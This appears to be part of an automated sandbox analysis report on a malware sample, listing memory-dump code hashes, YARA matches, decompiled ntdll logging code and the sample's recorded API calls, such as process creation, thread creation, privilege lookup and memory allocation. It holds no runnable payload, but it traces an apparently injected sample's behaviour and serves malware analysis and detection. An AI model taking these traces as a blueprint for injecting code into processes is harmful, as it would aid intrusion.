                                                                      • Opcode Fuzzy Hash: 3a88e88eaed2c06383bd434ade9da48025ead2c6134a81da287dcf9e5879b28c
                                                                      • Instruction Fuzzy Hash: 1FF0E232925698CFE776DF1CC1C4B32BBD8AB0277CF445475E84587AA2C728ED44C680
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fbfe2654f7d4dc65b267e6372326377e0fabc33182d6648fc3213862150d7a76
                                                                      • Instruction ID: 1238787d28ec70471ebcc3dc1497e53f57da9a53db0aa73ce1ba9dd2feff0ca1
                                                                      • Opcode Fuzzy Hash: fbfe2654f7d4dc65b267e6372326377e0fabc33182d6648fc3213862150d7a76
                                                                      • Instruction Fuzzy Hash: 09F054B0A042599BDB14EBA8D905E6E77A4AB04604F040499A9059B3D0EA34D900C754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e2e2dbbbd71cb0f8ee32f19f1ca571073fda8e7d582e352842e516f33cc795f
                                                                      • Instruction ID: 9ad6c01e6fec93d1d4fddc735f9dab0a0fb0843c423d843e17f460e772aea4cf
                                                                      • Opcode Fuzzy Hash: 6e2e2dbbbd71cb0f8ee32f19f1ca571073fda8e7d582e352842e516f33cc795f
                                                                      • Instruction Fuzzy Hash: 7EE09272A45821ABE3225F18AC00F6A77ADDBE4A59F094035EA05D7324D628ED01CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                      • Instruction ID: 974928e8c9ca846788bbdbfd918c675c1c529d270adf6ba13ce1ca6437339b76
                                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                      • Instruction Fuzzy Hash: 80E02632A40118FBDB31ABDD9E05FABBFBCDB98A64F040295FA04D7150D574AE00D2E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b65c79e307745449b45ed19987d597e68d17d9f2c724fc1b2d207b3bf96346d
                                                                      • Instruction ID: 2ab24c076f0022332675f78d22fad3f4789008ebe34b80ae44182fa43757812a
                                                                      • Opcode Fuzzy Hash: 6b65c79e307745449b45ed19987d597e68d17d9f2c724fc1b2d207b3bf96346d
                                                                      • Instruction Fuzzy Hash: F6E0DFB0609218EFD739EB99D160F257BBCAB52629F19805EE8084B542C621D884C29A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f0b902dee457fb22c9f07d51c036379f236b453a5d1c7a32117dffcdcbb9747c
                                                                      • Instruction ID: ee7095f6bf5adaf655ead4addee6a4af8aca0928055a72cabf2552a883c5a0e5
                                                                      • Opcode Fuzzy Hash: f0b902dee457fb22c9f07d51c036379f236b453a5d1c7a32117dffcdcbb9747c
                                                                      • Instruction Fuzzy Hash: 42F01578D10702CECBB3EFAEAF00704B6A4F768319F40812AD104872ADD77444A0CF05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                      • Instruction ID: 2ed4a0c739c3747e23b9c8b77ce17f522f589e81dbba8b1f28d7f11011660a97
                                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                      • Instruction Fuzzy Hash: EEE0C231280209BBDB235E88CC00F79BB1ADB50BA8F104035FE085AA90CA719C92D7C4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      • Instruction Fuzzy Hash: E290026530504842D500659A5408A060009A7D0249F51D021A1454595DCA758855B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94cea3d638beee5c96b2587b9a0141d0ffc5dbd89f9eede26d37e0e7f27269a6
                                                                      • Instruction ID: 62ace45bb005d135f760e89a48864ba1f5b4dd0ba9d46dbe6b5697a94e3b7a9d
                                                                      • Opcode Fuzzy Hash: 94cea3d638beee5c96b2587b9a0141d0ffc5dbd89f9eede26d37e0e7f27269a6
                                                                      • Instruction Fuzzy Hash: C790027930504842D900659A5804A870009A7D0349F51D421A081459CDCA948865B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23b120a627963c10ee0f899ed86b8bd4d6b76e29d22f35ffbd47ac3a9a362313
                                                                      • Instruction ID: feeff64f8c66cce559b676e868a36cda7afe4463c2235dacb07b5c355c9393d9
                                                                      • Opcode Fuzzy Hash: 23b120a627963c10ee0f899ed86b8bd4d6b76e29d22f35ffbd47ac3a9a362313
                                                                      • Instruction Fuzzy Hash: A990027530100803D500619A55087070009A7D0245F51D421A0814558DDA9688557161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3808abfe207ea31f8ee21b171a072689c02ab4aad18f448d8c59df5a496c3b17
                                                                      • Instruction ID: 0c96a9098cf52db9eee40a15f57205247f52adc942ca0e18f66dfb730df07ae6
                                                                      • Opcode Fuzzy Hash: 3808abfe207ea31f8ee21b171a072689c02ab4aad18f448d8c59df5a496c3b17
                                                                      • Instruction Fuzzy Hash: 6E90027530144402D540719A844460B5009B7E0345F51C421E0815554CCA55885AA261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 688590d4529436e706c7eca6224eb6545ef0fffeb6340cfba3b661cdf18225e8
                                                                      • Instruction ID: 0bb05899f4259a56e557a8790f1587c7a11dd9475628e59efc2a4d2044e946a5
                                                                      • Opcode Fuzzy Hash: 688590d4529436e706c7eca6224eb6545ef0fffeb6340cfba3b661cdf18225e8
                                                                      • Instruction Fuzzy Hash: 2D90027570500C02D550719A44147460009A7D0345F51C021A0414654DCB958A5976E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c7b671cc0ac55cbf4244875ce5041bb34cd4946e3e782542c0b8a23f20f9ea0
                                                                      • Instruction ID: 8beffa376f6632a3c104151e8713a75414470dcd665c06c942df39780b742856
                                                                      • Opcode Fuzzy Hash: 1c7b671cc0ac55cbf4244875ce5041bb34cd4946e3e782542c0b8a23f20f9ea0
                                                                      • Instruction Fuzzy Hash: 2A90027530140802D500619A48087470009A7D0346F51C021A5554555ECAA5C8957571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae7e701b977160690d7ec2c3888025da642c04868f51f1293c84923736829d3c
                                                                      • Instruction ID: 6e3197426d93c277b11fcb6cad5ddf4720357bfe3a699776b04b5efe33dd981c
                                                                      • Opcode Fuzzy Hash: ae7e701b977160690d7ec2c3888025da642c04868f51f1293c84923736829d3c
                                                                      • Instruction Fuzzy Hash: 7B90027530504C42D540719A4404A460019A7D0349F51C021A0454694DDA658D59B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0958ce03d2d502b678ed8a7cef163a9154a87b5121cbc42553fdeae8e465980a
                                                                      • Instruction ID: 59d237f0c562353fe11f6f3328c609fd4c81f17c486ea9abde86b1826893e6c9
                                                                      • Opcode Fuzzy Hash: 0958ce03d2d502b678ed8a7cef163a9154a87b5121cbc42553fdeae8e465980a
                                                                      • Instruction Fuzzy Hash: FB90026530144842D540629A4804B0F4109A7E1246F91C029A4546554CCD5588596761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 04d4ec12338942e5311d92c0c27e380356b2cd0407a12465bd666102aefe7839
                                                                      • Instruction ID: 774079c532aa4c0c092856b9ec9806525aece00d231e4e6fe02a97b0b37b633d
                                                                      • Opcode Fuzzy Hash: 04d4ec12338942e5311d92c0c27e380356b2cd0407a12465bd666102aefe7839
                                                                      • Instruction Fuzzy Hash: 9290027530100C42D500619A4404B460009A7E0345F51C026A0514654DCA55C8557561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: ff44a9dd03741a4eb9785cfc46d398004565a3323bbb8ed5da006283d8381724
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E013AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E0135CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E013A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E013A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}











                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013AFDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013AFE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013AFE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: edaa25c1466bc6a7f26488a64d77061cd470b278b53a279065c6705a33a4b2aa
                                                                      • Instruction ID: ec4cdce6aad364bc7af4b7b69caa109c38a1cbca6e7bbbbe9efcd943a2bd85f2
                                                                      • Opcode Fuzzy Hash: edaa25c1466bc6a7f26488a64d77061cd470b278b53a279065c6705a33a4b2aa
                                                                      • Instruction Fuzzy Hash: 48F0F632200601BFEA251A49DC06F37BF5EEB44B34F240315F728565D1EA62F82097F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02FA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02FA861D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 75a2258dc9f01862bb2d9d79663caefeda387dddd2dfcec0b0ef34b8951b9bd8
                                                                      • Instruction ID: e8b70a408e63f54fa72738d13b4f86d8ce10cd305ebeab23cddeb58ee088e7c6
                                                                      • Opcode Fuzzy Hash: 75a2258dc9f01862bb2d9d79663caefeda387dddd2dfcec0b0ef34b8951b9bd8
                                                                      • Instruction Fuzzy Hash: DD01A8B2201108ABCB08CF98DC94DEB37A9AF8C754F158648FA1997280C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02FA3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FA3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02FA861D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: 15aa4bcb72ba7aba5d1c64d83f28c70071d6f0f2f7bafa4ef1466838ea766c71
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 06F0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      • NtClose.NTDLL(02FA3D40,?,?,02FA3D40,00000000,FFFFFFFF), ref: 02FA8725
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFileRead
                                                                      • String ID:
                                                                      • API String ID: 752142053-0
                                                                      • Opcode ID: 1fe1f2aa58380e26ab21ed7810cd8b9037f567793dd091385844ff24f703d926
                                                                      • Instruction ID: 4082b79d33cf8af386a87dcefc469386fe658d1dd2b23487f2c2061fa207dcb8
                                                                      • Opcode Fuzzy Hash: 1fe1f2aa58380e26ab21ed7810cd8b9037f567793dd091385844ff24f703d926
                                                                      • Instruction Fuzzy Hash: 7501E4B6200108ABDB14DF99DC80DEB77ADEF8C794F158259FE1CA7241C670E9118BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: 8a7e0b5394d5850a54400337c3250fa13a58534f4a1267dfd8d4fe5fb3338f3a
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: 9AF0B7B2200208AFDB18DF89DC94EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(02FA3D62,5E972F65,FFFFFFFF,02FA3A21,?,?,02FA3D62,?,02FA3A21,FFFFFFFF,5E972F65,02FA3D62,?,00000000), ref: 02FA86C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 4855f6c545c6ee2abb5d30d1d68411e40293e545b554ceb51cb86db844b3a48a
                                                                      • Instruction ID: b7cb89fdb5dfb5ab1b3bf187e2f7b1b385ddec521076f67aabfe94ac2ff85cbd
                                                                      • Opcode Fuzzy Hash: 4855f6c545c6ee2abb5d30d1d68411e40293e545b554ceb51cb86db844b3a48a
                                                                      • Instruction Fuzzy Hash: 6FF01DB6110049ABCB04DF98DC94CEB77ADFF8C354B158649BD5D93201C534E8558BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F92D11,00002000,00003000,00000004), ref: 02FA87E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(02FA3D40,?,?,02FA3D40,00000000,FFFFFFFF), ref: 02FA8725
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02FA7398
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F93B93), ref: 02FA890D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F93B93), ref: 02FA890D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F972DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F972FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F972DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F972FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F99BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FA89A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FA89A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F9CCE0,?,?), ref: 02FA745C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F9CCE0,?,?), ref: 02FA745C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F9CFB2,02F9CFB2,?,00000000,?,?), ref: 02FA8A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F9CFB2,02F9CFB2,?,00000000,?,?), ref: 02FA8A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02FA3526,?,02FA3C9F,02FA3C9F,?,02FA3526,?,?,?,?,?,00000000,00000000,?), ref: 02FA88CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F97C83,?), ref: 02F9D44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

